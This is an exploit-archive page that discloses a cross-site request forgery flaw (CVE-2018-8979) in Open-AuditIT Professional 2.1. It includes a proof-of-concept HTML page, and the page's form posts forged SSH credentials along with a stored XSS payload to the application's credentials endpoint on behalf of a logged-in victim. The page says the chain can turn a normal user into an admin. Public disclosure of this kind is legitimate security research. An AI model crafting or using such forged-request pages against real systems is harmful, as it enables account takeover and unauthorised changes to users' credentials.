what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Open-AuditIT Professional 2.1 Cross Site Request Forgery

Open-AuditIT Professional 2.1 Cross Site Request Forgery
Posted Mar 21, 2018
Authored by Nilesh Sapariya

Open-AuditIT Professional version 2.1 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2018-8979
SHA-256 | 8e6847c5839288e1e3fdceee5be2bc421a1c945832bfd25a52a7ecc4ee5afa44

Open-AuditIT Professional 2.1 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: Open-AuditIT Professional 2.1 - Cross-Site Request Forgery (CSRF)
# Date: 27-03-2018
# Exploit Author: Nilesh Sapariya
# Contact: https://twitter.com/nilesh_loganx
# Website: https://nileshsapariya.blogspot.com
# Vendor Homepage: https://www.open-audit.org/
# Software Link : https://www.open-audit.org/downloads.php
# Version: 2.1
# CVE : CVE-2018-8979
# Tested on: Windows 10 Pro
# Category: Webapp Open-AuditIT Professional 2.1


1. Description:-
There is no CSRF protection in Open-AuditIT application, with a little help
of social engineering (like sending a link via email/chat) an attacker may
force the victim to click on a malicious link by which any normal user can
become an Admin user. The attack can force an end user to execute unwanted
actions on a web application in which they're currently authenticated.
Using this vulnerability, we were able to compromise entire user account
with chaining this bug with XSS.



2. Proof of Concept
Login into Open-AuditIT Professional 2.1
Step 1 :- Craft a HTML Page with XSS payload
Step 2:- Save this .html file and send it to victim (Victim should be
loggedin in the browser)
Crafted value will be added.


Affected Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/omk/open-audit/credentials"
method="POST">
<input type="hidden" name="data[attributes][name]"
value="<img src=x onerror=alert('hacked');>" />
<input type="hidden"
name="data[attributes][org_id]" value="1" />
<input type="hidden"
name="data[attributes][description]" value="CSRF" />
<input type="hidden" name="data[attributes][type]"
value="ssh" />
<input type="hidden"
name="data[attributes][credentials][username]"
value="test" />
<input type="hidden"
name="data[attributes][credentials][password]"
value="test" />
<input type="hidden" name="data[type]" value="credentials" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


aa3] POCs and steps:
https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html


Thanks & Regards,
Nilesh Sapariya
Security Researcher
https://twitter.com/nilesh_loganx
*https://nileshsapariya.blogspot.in




Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close